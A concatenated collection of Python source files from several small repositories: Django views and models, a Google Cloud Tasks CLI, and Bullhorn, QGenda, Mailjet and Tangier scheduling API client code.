class ProfilesView(Security, generic.ListView):
template_name = 'profiles/view_profile.html'
model = models.Profile
context_object_name = 'profiles'
def get_queryset(self):
return models.Profile.objects.filter(is_removed=False).exclude(user__is_staff=True).order_by('-id')
#Hour
class HoursCreateView(Security, generic.CreateView):
template_name = 'hours/form_hour.html'
# permission_required = 'core.can_view_clients'
form_class = forms.HourForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
def form_valid(self, form):
return super().form_valid(form)
def get_success_url(self):
return reverse('create_holidays')
class HoursView(Security, generic.ListView):
template_name = 'hours/view_hour.html'
model = models.Hour
context_object_name = 'hours'
# Holiday
class HolidaysCreateView(Security, generic.CreateView):
template_name = 'holidays/form_holiday.html'
# permission_required = 'core.can_view_clients'
form_class = forms.HolidayForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
def form_valid(self, form):
return super().form_valid(form)
def get_success_url(self):
return reverse('create_holidays')
class HolidaysView(Security, generic.ListView):
template_name = 'holidays/view_holiday.html'
model = models.Holiday
context_object_name = 'holidays'
# Profession
class ProfessionsCreateView(Security, generic.CreateView):
template_name = 'professions/form_profession.html'
# permission_required = 'core.can_view_clients'
form_class = forms.ProfessionForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
return context
def form_valid(self, form):
return super().form_valid(form)
def get_success_url(self):
return reverse('create_professions')
class ProfessionsView(Security, generic.ListView):
template_name = 'professions/view_profession.html'
model = models.Profession
context_object_name = 'professions'
def get_queryset(self):
return models.Profession.objects.filter(is_removed=False).order_by('-id')
# dash
class Dashboard(Security, generic.TemplateView):
template_name = 'dashboard.html'
``` |
{
"source": "jjorgewill/template-resources-micro-service",
"score": 2
} |
#### File: apps/core/schema.py
```python
from apps.core import models
import graphene
from graphene_django.types import DjangoObjectType
class CompanyType(DjangoObjectType):
class Meta:
model = models.Company
class ProfileType(DjangoObjectType):
class Meta:
model = models.Profile
class Query(object):
all_companies = graphene.List(CompanyType)
all_profiles = graphene.List(ProfileType)
def resolve_all_companies(self, info, **kwargs):
return models.Company.objects.all()
def resolve_all_profiles(self, info, **kwargs):
return models.Profile.objects.all()
``` |
{
"source": "jjorissen52/django-cloud-tasks",
"score": 2
} |
#### File: django-cloud-tasks/cloud_tasks/cli.py
```python
if __name__ == '__main__':
import os
import sys
from django import setup
sys.path.insert(0, os.path.abspath(os.getcwd()))
try:
setup()
except ModuleNotFoundError as e:
raise ModuleNotFoundError(
f"Your django project settings could not be imported. The indicated settings module is "
f"{os.environ['DJANGO_SETTINGS_MODULE']}, and you executed cloud-tasks from the directory "
f"{os.path.abspath(os.getcwd())}. Please make sure that the relative path from your "
f"current working directory as indicated by DJANGO_SETTINGS_MODULE is accurate.")
import subprocess
from django.db.models import Q
from django.contrib.auth import get_user_model
import cloud_tasks.models as models
from cloud_tasks import gtasks, conf
from cloud_tasks.utils import hardcode_reverse
from cloud_tasks.openid import create_token, decode_token
User = get_user_model()
class CloudTasks:
class tasks:
@staticmethod
def list(offset=0, limit=100):
return list(models.Task.objects.values('name')[offset:limit])
@staticmethod
def exec(name: str):
return f'{models.Task.objects.get(name=name).execute()} ' \
f'- {hardcode_reverse("admin:cloud_tasks_taskexecution_changelist")}'
class steps:
@staticmethod
def list(offset=0, limit=100, task=None):
q = Q() if not task else Q(task__name__iexact=task)
return list(
models.Step.objects.filter(q).values(
"name", "action", "id",
"payload", "success_pattern",
"task_id", "task__name"
)[offset:limit]
)
@staticmethod
def exec(name: str):
return f'{models.Step.objects.get(name=name).execute()} ' \
f'- {hardcode_reverse("admin:cloud_tasks_taskexecution_changelist")}'
class executions:
@staticmethod
def list(offset=0, limit=100, task=None):
q = Q() if not task else Q(task__name__iexact=task)
return list(
models.TaskExecution.objects.filter(q).values(
"id",
"results",
"status",
"task__name",
"task_id",
)[offset:limit]
)
class schedules:
@staticmethod
def list(offset=0, limit=100, clock=None, task=None):
q = Q()
if clock:
q &= Q(clock__name__iexact=clock)
if task:
q &= Q(task__name__iexact=task)
return list(
models.TaskSchedule.objects.filter(q).values(
"id",
"name",
"enabled",
"clock__name",
"clock_id",
"clock__cron",
"task__name",
"task_id"
)[offset:limit]
)
@staticmethod
def exec(name: str):
return f'{models.TaskSchedule.objects.get(name=name).run()} ' \
f'- {hardcode_reverse("admin:cloud_tasks_taskexecution_changelist")}'
class clocks:
@staticmethod
def list(offset=0, limit=100):
return list(models.Clock.objects.values(
'name',
'cron',
'management',
'status'
)[offset:limit])
@staticmethod
def tick(name: str):
return models.Clock.objects.get(name=name).tick()
@staticmethod
def start(name: str):
_, message = models.Clock.objects.get(name=name).start_clock()
return message
@staticmethod
def pause(name: str):
_, message = models.Clock.objects.get(name=name).pause_clock()
return message
@staticmethod
def delete(name: str):
_, message = models.Clock.objects.get(name=name).delete_clock()
return message
@staticmethod
def sync(name: str):
_, message = models.Clock.objects.get(name=name).sync_clock()
return message
class schedules:
@staticmethod
def list(offset=0, limit=100, clock=None, task=None):
q = Q()
if clock:
q &= Q(clock__name__iexact=clock)
if task:
q &= Q(task__name__iexact=task)
return list(
models.TaskSchedule.objects.filter(q).values(
"id",
"name",
"enabled",
"clock__name",
"clock_id",
"clock__cron",
"task__name",
"task_id"
)[offset:limit]
)
class auth:
class open_id:
class tokens:
@staticmethod
def create(audience):
return create_token(audience)
@staticmethod
def decode(token, audience=None):
return decode_token(token, audience)
class accounts:
@staticmethod
def register(email: str):
try:
User.objects.get(email__iexact=email)
return f'User for service account {email} already exists.'
except User.DoesNotExist:
User.objects.create(email=email, username=email)
return f'Created User for service account {email}.'
@staticmethod
def delete(email: str):
try:
User.objects.filter(email__iexact=email).delete()
return f'Deleted User for service account {email}'
except User.DoesNotExist:
return f'User for service account {email} does not exist.'
class cloud:
class account:
@staticmethod
def grant_required_roles(email: str):
cmd_template = "gcloud projects add-iam-policy-binding {PROJECT_ID} " \
"--member serviceAccount:{email} --role {role}"
roles = [
'roles/cloudtasks.admin',
'roles/cloudscheduler.admin',
'roles/cloudfunctions.invoker',
]
for role in roles:
cmd = cmd_template.format(PROJECT_ID=conf.PROJECT_ID, email=email, role=role)
process = subprocess.Popen(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if stdout:
sys.stdout.write(f'{stdout.decode()}\n')
if stderr:
sys.stderr.write(f'{stderr.decode()}\n')
sys.stdout.flush()
sys.stderr.flush()
class tasks:
list = staticmethod(gtasks.list_tasks)
create = staticmethod(gtasks.create_task)
delete = staticmethod(gtasks.delete_task)
def main():
import fire
fire.Fire(CloudTasks)
if __name__ == '__main__':
main()
``` |
{
"source": "jjorissen52/django-env-settings",
"score": 2
} |
#### File: management/commands/generate_dot_env.py
```python
import os
from django.core.management import BaseCommand
from django.template.loader import render_to_string
from django.conf import settings
class Command(BaseCommand):
@staticmethod
def generate():
params = settings.ENV
allowed_hosts = ','.join(params.ALLOWED_HOSTS) if isinstance(params.ALLOWED_HOSTS, list) else params.ALLOWED_HOSTS
params.ALLOWED_HOSTS = allowed_hosts
dot_env = render_to_string('dot_env_template',
{"parameters": params.__dict__})
with open(os.path.join(settings.BASE_DIR, '.env'), 'w') as f:
f.write(dot_env)
def add_arguments(self, parser):
parser.add_argument('-y', action='store_true')
def handle(self, *args, **options):
if options.get('y', False):
self.generate()
else:
confirm = input("Are you sure you want to generate .env in the project root?"
" This will override any existing version of that file. [y/N] ")
if confirm.lower() in ('y', 'yes'):
self.generate()
else:
print("cancelled.")
```
#### File: management/commands/printenv.py
```python
from django.core.management import BaseCommand
from django.conf import settings
class Command(BaseCommand):
def handle(self, *args, **options):
for key, value in settings.ENV.__dict__.items():
print(f'{key:25} {value}')
``` |
{
"source": "jjorissen52/python-bullhorn",
"score": 2
} |
#### File: bullhorn/pipeline_methods/pre.py
```python
import ast
import time
import logging
from bullhorn.api.exceptions import APICallError
REST_API_PARAMS = "command method entity select_fields start sort count query entity_id_str body where".split(" ")
VALID_COMMANDS = ['search', 'query', 'entity', 'entityFiles']
ENTITY_ID_REQUIRED_METHODS = ['UPDATE', 'DELETE']
VALID_METHODS = ['GET', 'POST'] + ENTITY_ID_REQUIRED_METHODS
def keep_authenticated(params):
"""
"""
request_start = time.time()
self = params.get('self')
auth_details = self.auth_details
expiration_time = auth_details.get("expiration_time", 0) if auth_details else 0
if self.leader and not auth_details:
self.authenticate()
auth_details = self.auth_details
else:
retries = 10
while retries:
if expiration_time - request_start <= 0:
time.sleep(1)
auth_details = self.auth_details
if auth_details:
break
retries -= 1
return params
def clean_api_call_input(params):
problems = []
command, method, entity = params.get('command', None), params.get('method', None), params.get('entity', None)
select_fields, query, body = params.get('select_fields', None), params.get('query', None), params.get('body', '')
entity_id = params.pop('entity_id', None)
entity_id_str = f'/{entity_id}' if entity_id else ''
if method and method.upper() in ENTITY_ID_REQUIRED_METHODS and not entity_id:
problems.append(f"entity_id is a required field for all {ENTITY_ID_REQUIRED_METHODS} methods.")
if command and command.lower() != 'query':
for param in params.keys():
if param not in REST_API_PARAMS and param != 'self':
logging.warning(f'{param} is not an acceptable api parameter. '
f'You may only filter by keyword arguments when using the query command.')
elif command:
if 'where' not in params:
problems.append('where is a required argument for the query command. It cannot be none.')
if command and command.lower() == 'search':
if 'query' not in params:
problems.append("query is a required argument when using the search command.")
if command and command.lower() == 'entity' and method.upper() != 'CREATE' and not entity_id:
problems.append("entity_id is a required argument when attempting to access existing records.")
if not command or not command.lower() in VALID_COMMANDS:
problems.append(f"{command} is not a valid command. Valid commands are {VALID_COMMANDS}")
if not method or not method.upper() in VALID_METHODS:
problems.append(f"{command} is not a valid method. Valid methods are {VALID_METHODS}")
if not entity:
problems.append(f"{entity} is not a valid entity.")
if not select_fields or not isinstance(select_fields, (str, list)):
problems.append(f"{select_fields} is not a valid argument for select_fields. Must be a str or list")
else:
if isinstance(select_fields, list):
select_fields = ','.join(select_fields)
select_fields = select_fields.replace(' ', '')
if problems:
raise APICallError("\n".join(problems))
params.update({"command": command.lower(), "method": method.upper()})
params.update({"entity_id_str": entity_id_str})
params.update({'select_fields': select_fields})
return params
def clean_api_search_input(params):
required_params = "entity query select_fields".split(" ")
if not all(required in params for required in required_params):
raise APICallError("search command requires entity, query, and select_fields are required arguments.")
return params
def translate_kwargs_to_query(params):
mapping = {'gt': '{}>{}', 'gte': '{}>={}', 'lt': '{}<{}', 'lte': '{}<={}', 'to': '{}:[{} TO {}]', 'eq': '{}:{}',
'ne': 'NOT {}:{}'}
supported_comparisons = ['gt', 'gte', 'lt', 'lte', 'to', 'eq', 'ne']
implicit_and = []
for param in params:
if param not in REST_API_PARAMS:
field, comparison = param, 'eq'
if len(param.split('__')) == 2 and param.split('__')[-1] in supported_comparisons:
param, comparison = param.split('__')[0], param.split('__')[-1]
if comparison not in ['ne', 'to']:
implicit_and.append(mapping[comparison].format(field, params.get(param)))
elif comparison == 'to':
to_list = ast.literal_eval(params.get(param))
if not isinstance(to_list, list):
raise APICallError(f'{param} should be a list of two elements, cannot be {params.get(param)}. '
f'Ex: {param}=[1, 2]')
# implicit_and.append()
raise NotImplementedError('interrupted')
```
#### File: python-bullhorn/bullhorn/settings.py
```python
import configparser
import os
import logging
PROJECT_DIR = os.path.dirname(os.path.dirname(__file__))
ENV_CONF_FILE = os.environ.get('BULLHORN_CONF_FILE')
ENV_CONF_REGION = os.environ.get('BULLHORN_CONF_REGION')
DEBUG = bool(os.environ.get('BULLHORN_DEBUG'))
if ENV_CONF_FILE:
CONF_FILE = ENV_CONF_FILE
else:
CONF_FILE = ''
logging.warn('Please make sure you set the BULLHORN_CONF_FILE '
'environment variable. API will not function without it.')
CONF_REGION = ENV_CONF_REGION if ENV_CONF_REGION else 'bullhorn'
DEFAULTS = {
'client_id': None,
'client_secret': None,
'username': None,
'password': <PASSWORD>,
'login_url': 'https://auth.bullhornstaffing.com/oauth/authorize',
'grant_url': 'https://auth.bullhornstaffing.com/oauth/token',
'rest_login_url': 'https://rest.bullhornstaffing.com/rest-services/login',
'api_version': '*',
'cache_backend': None,
'cache_host': None,
'cache_port': None,
'cache_lifetime': 0,
'debug': DEBUG,
}
def read_config(keys):
"""
We don't want a failed import for bad config, we just want to set everything that is not in the config file/region
set to None
:param keys: (iterable) default keys to set to None
:return:
"""
config = configparser.ConfigParser(defaults=DEFAULTS)
config.read(CONF_FILE)
if not config.has_section(CONF_REGION):
config.add_section(CONF_REGION)
parameters = {key: config.get(CONF_REGION, key) for key in keys}
parameters.update({'config': config})
return parameters
config_dict = read_config(DEFAULTS.keys())
CLIENT_ID = config_dict.get('client_id')
CLIENT_SECRET = config_dict.get('client_secret')
USERNAME = config_dict.get('username')
PASSWORD = <PASSWORD>_<PASSWORD>('password')
LOGIN_URL = config_dict.get('login_url')
GRANT_URL = config_dict.get('grant_url')
REST_LOGIN_URL = config_dict.get('rest_login_url')
API_VERSION = config_dict.get('api_version')
CACHE_BACKEND = config_dict.get('cache_backend')
USE_CACHING = bool(CACHE_BACKEND)
CACHE_HOST = config_dict.get('cache_host')
CACHE_PORT = config_dict.get('cache_port')
CACHE_LIFETIME = int(config_dict.get('cache_lifetime') if config_dict.get('cache_lifetime') else 0)
DEBUG = config_dict.get('debug')
``` |
{
"source": "jjorissen52/python-qgenda",
"score": 2
} |
#### File: qgenda/pipeline/pipelines.py
```python
import functools
import sys
from qgenda import helpers
from qgenda.cache import cache
from qgenda.settings import CACHE_LIFETIME
class pre_execution_pipeline:
def __init__(self, *pipline_functions):
self.pipeline_functions = pipline_functions
for pipeline in self.pipeline_functions:
module = str(sys.modules[pipeline.__module__])
assert 'pipeline.pre' in module, f'{pipeline.__name__} must be in qgenda_api.pipeline.pre'
def __call__(self, method):
@functools.wraps(method)
def decorated(client_obj, *args, **kwargs):
params = helpers.named_method_params(method, args, kwargs)
request_key = f'{method.__name__}:{args}:{kwargs}'.replace(' ', '_') # memcached does not allow spaces
setattr(client_obj, 'latest_request_key', request_key)
cached_response = cache.get(request_key) if client_obj.use_caching else None
if cached_response:
return cached_response
caller_name = method.__name__
# need to save caller so the pos_execution pipeline can get access.
if not getattr(self, 'caller', None):
setattr(self, 'caller', method)
for pipline_func in self.pipeline_functions:
client_obj, caller_name, params = pipline_func(client_obj, caller_name, params)
# storing execution params and cache key on client for use by post_execution_pipeline
setattr(client_obj, 'latest_execution_params', {**params})
return method(client_obj, **params)
return decorated
class post_execution_pipeline:
"""
object pass in __call__ will either be a method or a pre-execution pipeline.
"""
def __init__(self, *pipline_functions):
self.pipeline_functions = pipline_functions
for pipeline in self.pipeline_functions:
module = str(sys.modules[pipeline.__module__])
assert 'pipeline.post' in module, f'{pipeline.__name__} must be in qgenda_api.pipeline.post'
def __call__(self, method):
@functools.wraps(method)
def decorated(client_self, *args, **kwargs):
request_key = client_self.latest_request_key
execution_params = getattr(client_self, 'latest_execution_params', None)
response = method(client_self, *args, **kwargs)
if not execution_params:
return response
for pipline_func in self.pipeline_functions:
client_self, response = pipline_func(client_self, response)
if client_self.use_caching:
cache.set(request_key, response, CACHE_LIFETIME)
return response
return decorated
```
#### File: qgenda/pipeline/post.py
```python
import json
import time
from qgenda.api.exceptions import HTTPError, APICallError
def handle_error_response(logger):
def real_decorator(client_obj, response):
"""
Raises HTTPError if there is an HTTP error and raise_errors=True, otherwise just adds error information to
response.text
"""
raise_errors = client_obj.raise_errors
if response.status_code >= 400:
logger.error(f'API Call returned HTTP error response {response.status_code}: {response.reason}')
if raise_errors:
raise HTTPError(f'API Call returned HTTP error response {response.status_code}: {response.reason}')
else:
setattr(response, 'text', {
"error": response.status_code,
"error_description": response.reason,
})
else:
response_dict = json.loads(response.text)
if any(["error" in key for key in response_dict]) and raise_errors:
raise APICallError(f'Error Response: {json.dumps(response_dict, indent=2)}')
return client_obj, response
return real_decorator
def handle_login_response(client_obj, response):
"""
For now just sets auth_details on the caller, but will eventually handle caching
"""
request_start = time.time()
response_dict = json.loads(response.text)
if "expires_in" in response_dict:
expiration_time = request_start + int(response_dict["expires_in"]) - 30 # 30 second buffer here to be safe
response_dict.update({"expiration_time": expiration_time})
client_obj.auth_details = response_dict
return client_obj, response
```
#### File: qgenda/pipeline/pre.py
```python
import time
from qgenda import helpers
def gzip_headers(method_self, caller=None, params=None):
if caller not in method_self.gzip_safe:
use_gzip = params.pop('gzip', False)
params['headers'] = method_self.headers if use_gzip else {
key: value for key, value in method_self.headers.items() if value != 'gzip'
}
return method_self, caller, params
def keep_authenticated(method_self, caller=None, params=None):
"""
"""
request_start = time.time()
auth_details = method_self.auth_details
expiration_time = auth_details.get("expiration_time", 0) if auth_details else 0
if method_self.leader and not auth_details:
method_self.authenticate()
auth_details = method_self.auth_details
else:
retries = 10
while retries:
if expiration_time - request_start <= 0:
time.sleep(1)
auth_details = method_self.auth_details
if auth_details:
break
retries -= 1
if "access_token" in auth_details:
method_self.headers.update({"Authorization": f'bearer {auth_details["access_token"]}'})
params['headers'].update({"Authorization": f'bearer {auth_details["access_token"]}'})
return method_self, caller, params
def prepare_odata(logger):
odata_filters = ['$filter', '$select', '$orderby']
def real_decorator(method_self, caller, params):
odata_kwargs = params.get('odata_kwargs', {})
extra = []
if odata_kwargs:
extra = [key for key in odata_kwargs.keys() if key not in odata_filters]
if extra:
for e in extra:
odata_kwargs.pop(e)
logger.warning(f'Extra OData filter(s) removed from kwargs. Invalid filter {extra}')
params['odata_kwargs'] = odata_kwargs
return method_self, caller, params
return real_decorator
```
#### File: qgenda/tests/test_exceptions.py
```python
import unittest
import os
os.environ['QGENDA_CONF_REGION'] = 'qgenda_test' # ensure bad imports
from qgenda.api.client import QGendaClient
from qgenda.api import exceptions
"""
NOTE: RUNNING THIS TEST WILL RUIN YOUR IMPORTS! YOU WILL NEED TO RUN THIS TEST SEPARATELY FROM THE OTHERS!
"""
class TestRaises(unittest.TestCase):
def test_improper_config(self):
with self.assertRaises(exceptions.ImproperlyConfigured):
QGendaClient(None, 'password', company_key=None, raise_errors=True)
def test_bad_login(self):
with self.assertRaises(exceptions.APICallError):
client = QGendaClient('username', 'password', 'company_key', api_version='v2',
api_url='https://api.qgenda.com/', raise_errors=True)
client.authenticate()
class TestNoRaise(unittest.TestCase):
def test_bad_login(self):
client = QGendaClient('username', 'password', 'company_key', api_version='v2',
api_url='https://api.qgenda.com/', raise_errors=False)
client.authenticate()
self.assertTrue(all(key in client.auth_details for key in ["error", "error_description"]))
if __name__ == '__main__':
unittest.main()
```
#### File: qgenda/tests/test_shared_auth.py
```python
import datetime
import json
import time
import unittest
import logging
from qgenda.api.client import QGendaClient
from qgenda.api import exceptions
logger = logging.getLogger(__name__)
class TestSharedAuth(unittest.TestCase):
"""
Testing the leader/follower implementation.
"""
def test_bad_config(self):
with self.assertRaises(exceptions.ImproperlyConfigured):
client = QGendaClient(raise_errors=True, use_caching=False, leader=False)
def test_shared_auth_basic(self):
client1 = QGendaClient(raise_errors=True, leader=True)
if not client1.use_caching:
logger.warning('Caching is disabled and shared auth will not be used.')
return
client2 = QGendaClient(raise_errors=True, leader=False)
response1 = client1.get_staff()
response2 = client2.get_staff()
self.assertTrue(response1.status_code, 200)
self.assertTrue(response2.status_code, 200)
def test_shared_auth_excessive(self):
leader = QGendaClient(raise_errors=True, leader=True)
if not leader.use_caching:
logger.warning('Caching is disabled and shared auth will not be used.')
return
response = leader.get_staff()
self.assertTrue(response.status_code, 200)
start = time.time()
for i in range(100):
client = QGendaClient(raise_errors=True, leader=False)
response = client.get_staff()
self.assertTrue(response.status_code, 200)
latest = time.time()
self.assertTrue(latest - start < 3, 'Caching test is taking too long. '
'Caching is slow or improperly configured.')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jjorissen52/react-wedding",
"score": 2
} |
#### File: wedding_api/content/models.py
```python
from django.db import models
class Page(models.Model):
slug = models.CharField(max_length=50, unique=True)
contents = models.ManyToManyField('content.Content')
order = models.IntegerField(default=0, help_text='lower number is higher priority.')
class Meta:
ordering = ('order', )
def __str__(self):
return str(self.slug)
class Content(models.Model):
header = models.TextField(blank=True, null=True)
description = models.TextField(blank=True, null=True)
background = models.FileField(blank=True, null=True, upload_to='uploaded_backgrounds')
order = models.IntegerField(default=0, help_text='lower number is higher priority.')
class Meta:
ordering = ('order', )
def __str__(self):
return str(self.header)
class Image(models.Model):
title = models.CharField(max_length=50)
file = models.FileField(blank=True, null=True, upload_to='uploaded_images')
def __str__(self):
return str(self.title)
```
#### File: wedding_api/mailjet/views.py
```python
import json
import os, configparser
import requests
from django.core.mail import send_mail
from rest_framework.permissions import AllowAny
from rest_framework.viewsets import GenericViewSet
from rest_framework.generics import CreateAPIView
from rest_framework.response import Response
from . import serializers
from django.conf import settings
config = configparser.ConfigParser()
config.read(os.path.join(settings.BASE_DIR, 'secrets.ini'))
SENDER_EMAIL = config.get('mailjet', 'SENDER_EMAIL')
RECIPIENT_EMAIL = config.get('mailjet', 'RECIPIENT_EMAIL')
MJ_APIKEY_PUBLIC = config.get('mailjet', 'MJ_APIKEY_PUBLIC')
MJ_APIKEY_PRIVATE = config.get('mailjet', 'MJ_APIKEY_PRIVATE')
class SendViaMailJet(CreateAPIView, GenericViewSet):
serializer_class = serializers.MailJetSerializer
permission_classes = [AllowAny]
def create(self, request, *args, **kwargs):
serializer = SendViaMailJet.serializer_class(data=request.data)
if not serializer.is_valid():
return Response({
"errors": "Your email could not be sent. Please ensure that you've filled out all fields completely."
})
if getattr(request, "_total_emails_sent", None) >= settings.TOTAL_EMAILS_ALLOWED:
return Response({
"errors": "Your email could not processed at this time. We are recieving an unusally large amount of "
"email requests and must investigate."
})
error_message = ""
try:
notification_text = serializer.data["message"]
send_mail(f"Wedding Contact Request - {serializer.data['name']}",
notification_text,
settings.DEFAULT_FROM_EMAIL,
[serializer.data['email']], html_message=f"<html>{notification_text}</html>", fail_silently=False)
except Exception:
error_message += "Something went wrong, and JP and Sarah will not be receiving this email."
try:
reciept_text = f'You sent the following message to JP and Sarah: {serializer.data["message"]}'
send_mail("Wedding Contact Request - Message Receipt",
reciept_text,
settings.DEFAULT_FROM_EMAIL,
[serializer.data['email']], html_message=f"<html>{reciept_text}</html>", fail_silently=False)
except Exception:
if not error_message:
error_message += "Your email was sent, but something went wrong and you will not be receiving a " \
"send receipt via email."
if error_message:
return Response({
"errors": error_message
})
else:
return Response({"results": "Thanks for reaching out! You should receive a message receipt soon."})
``` |
{
"source": "jjorissen52/tangier_api",
"score": 2
} |
#### File: tangier_api/api/location.py
```python
import zeep
import requests
import xmlmanip
from tangier_api import settings
from tangier_api import exceptions
from tangier_api import wrappers
class LocationConnection:
def __init__(self, xml_string="", endpoint=settings.LOCATION_ENDPOINT, show_xml_request=False, show_xml_response=False):
"""
:param xml_string: override the default xml, which is just <tangier method="schedule.request"/>
:param endpoint: where the WSDL info is with routing info and SOAP API definitions
"""
super(self.__class__, self).__init__()
if not xml_string:
self.base_xml = """<tangier version="1.0" method="location.request"></tangier>"""
else:
self.base_xml = xml_string
# these two are used with @debug_options
self.show_xml_request = show_xml_request
self.show_xml_response = show_xml_response
self.base_xml = xmlmanip.inject_tags(self.base_xml, admin_user=settings.TANGIER_USERNAME, admin_pwd=settings.TANGIER_PASSWORD)
self.client = zeep.Client(endpoint, transport=zeep.transports.Transport(session=requests.Session()))
@wrappers.handle_response
@wrappers.debug_options
def MaintainLocations(self, xml_string):
"""
WSDL GetLocation method
:param xml_string: (xml str) fully formed xml string for GetLocation request
:return:
"""
return self.client.service.MaintainLocations(xml_string)
def get_locations_info(self, site_ids=None, xml_string=None):
"""
:param xml_string: (xml string) overrides the default credential and/or location injection into base_xml
:return: xml response string with an error message or info about a location.
"""
# sites = {"site_id": site_id for i, site_id in enumerate(site_ids)}
if not site_ids:
site_ids = 'ALL_SITE_IDS'
if not issubclass(site_ids.__class__, list):
site_ids = [site_ids]
tags = {f"location__{i}": {"action": "info", "__inner_tag": {"site_id": site_id}} for i, site_id in
enumerate(site_ids)}
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, locations="")
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="locations", **tags)
return self.MaintainLocations(xml_string).encode('utf-8')
def location_info_values_list(self, site_ids=None):
"""
Returns a Searchable List object (subclass of list) of all locations returned by get_locations_info
:param provider_ids: (list) of all emp_ids corresponding to desired locations info
:return: (SearchableList) of all locations returned by get_locations_info
"""
xml_string = self.get_locations_info(site_ids)
schema = xmlmanip.XMLSchema(xml_string)
# kind of hacky way to get every element with a site_id tag
location_list = schema.search(site_id__contains='')
return location_list
def add_location(self, site_id=None, xml_string=None, name=None, short_name=None, **kwargs):
"""
:param site_id: (str) id of site to be added
:param xml_string: (xml string) overrides the default credential and/or location injection into base_xml
:param kwargs: additional named properties to be provided in the creation request.
:return: xml response string with an error message or info about a location.
"""
if not (site_id and name and short_name):
raise exceptions.APICallError(f'site_id, name, and short_name are all required key-word arguments.')
tags = {f"location": {"action": "add", "__inner_tag": {"site_id": site_id,
"name": name, 'short_name': short_name, **kwargs}}}
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, locations="")
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="locations", **tags)
return self.MaintainLocations(xml_string).encode('utf-8')
def update_location(self, site_id=None, new_site_id=None, xml_string=None, name=None, short_name=None, **kwargs):
"""
:param site_id: (str) id of site to be added
:param new_site_id: (str) id of site to be renamed, if desired
:param xml_string: (xml string) overrides the default credential and/or location injection into base_xml
:param kwargs: additional named properties to be provided in the creation request.
:return: xml response string with an error message or info about a location.
"""
if not (site_id and name and short_name):
raise exceptions.APICallError(f'site_id, name, and short_name are all required key-word arguments.')
if new_site_id:
tags = {f"location": {"action": "update",
"__inner_tag": {"site_id": site_id, 'new_site_id': new_site_id,
"name": name, 'short_name': short_name, **kwargs}}}
else:
tags = {f"location": {"action": "update", "__inner_tag": {"site_id": site_id, "name": name,
'short_name': short_name, **kwargs}}}
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, locations="")
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="locations", **tags)
return self.MaintainLocations(xml_string).encode('utf-8')
def delete_location(self, site_id=None, xml_string=None):
"""
:param site_id: (str) id of site to be deleted
:param xml_string: (xml string) overrides the default credential and/or location injection into base_xml
:return: xml response string with an error message or info about a location.
"""
if not site_id:
raise exceptions.APICallError(f'site_id cannot be {site_id}')
tags = {f"location": {"action": "delete", "__inner_tag": {"site_id": site_id}}}
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, locations="")
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="locations", **tags)
return self.MaintainLocations(xml_string).encode('utf-8')
```
#### File: tangier_api/api/provider.py
```python
import zeep
import requests
import xmlmanip
from tangier_api import settings
from tangier_api import exceptions
class ProviderConnection:
def __init__(self, xml_string="", endpoint=settings.PROVIDER_ENDPOINT):
"""
Injects credentials into <tanger/> root schema and
:param xml_string: override the base xml, which is just <tangier method="schedule.request"/>
:param endpoint: where the WSDL info is with routing info and SOAP API definitions
"""
if not xml_string:
self.base_xml = """<tangier version="1.0" method="provider.request"></tangier>"""
else:
self.base_xml = xml_string
self.base_xml = xmlmanip.inject_tags(self.base_xml, admin_user=settings.TANGIER_USERNAME,
admin_pwd=<PASSWORD>)
self.client = zeep.Client(endpoint, transport=zeep.transports.Transport(session=requests.Session()))
def MaintainProviders(self, xml_string=""):
return self.client.service.MaintainProviders(xml_string)
def get_provider_info(self, provider_ids=None, use_primary_keys=True, all_providers=True, xml_string="", **tags):
"""
Method to retrieve info on all providers corresponding to the list "provider_ids"
:param provider_ids: (list) of all emp_ids corresponding to desired provider info
:param use_primary_keys: (bool) indicates whether provider_ids should be treated as emp_id or provider_primary_key
:param all_providers: (bool) indicates whether to return data on all existing providers
:param xml_string: (xml string) overrides default xml string provided by the instantiation of the class object
:param tags: (kwargs) things to be injected into the request. ex: start_date="2017-05-01", end_date="2017-05-02"
:return:
"""
if not provider_ids and not all_providers:
raise exceptions.APICallError("You must provide either a list of provider_ids or set all_providers=True.")
elif not isinstance(provider_ids, list):
provider_ids = [provider_ids]
xml_string = xml_string if xml_string else self.base_xml
xml_string = xmlmanip.inject_tags(xml_string, injection_index=2, providers="")
provider_dict = {}
id_label = "provider_primary_key" if use_primary_keys else "emp_id"
if not all_providers:
for i, provider_id in enumerate(provider_ids):
provider_dict[f'provider__{i}'] = {"action": "info", "__inner_tag": {id_label: f"{provider_id}"}}
else:
provider_dict[f'provider'] = {"action": "info", "__inner_tag": {id_label: "ALL"}}
xml_string = xmlmanip.inject_tags(xml_string, parent_tag="providers", **provider_dict)
# return xml_string
return self.MaintainProviders(xml_string).encode('utf-8')
def provider_info_values_list(self, use_primary_keys=True, **kwargs):
"""
Wrapper for get_provider info which converts the xml response into a list of dicts
"""
xml_string = self.get_provider_info(**kwargs)
schema = xmlmanip.XMLSchema(xml_string)
if kwargs.get('all_providers'):
id_label = 'provider_primary_key'
else:
id_label = "provider_primary_key" if use_primary_keys else "emp_id"
# using contains method here is kind of hacky way to get every element with an {id_label} tag, basically I'm
# just checking to see that the label even exists
label_dict = {f"{id_label}__contains": ""}
provider_list = schema.search(**label_dict)
return provider_list
```
#### File: tangier_api/api/specialty.py
```python
import sys
import pandas
import re
import xmlmanip
from tangier_api.api import ScheduleConnection
from tangier_api.api import ProviderConnection
from tangier_api.api import LocationConnection
from tangier_api import helpers
from tangier_api import exceptions
class ScheduleManipulation(ScheduleConnection):
def save_schedule_from_range(self, start_date=None, end_date=None, site_ids=None, xml_string="", **tags):
"""
Saves schedule for indicated date range and facilities to ScheduleConnection object
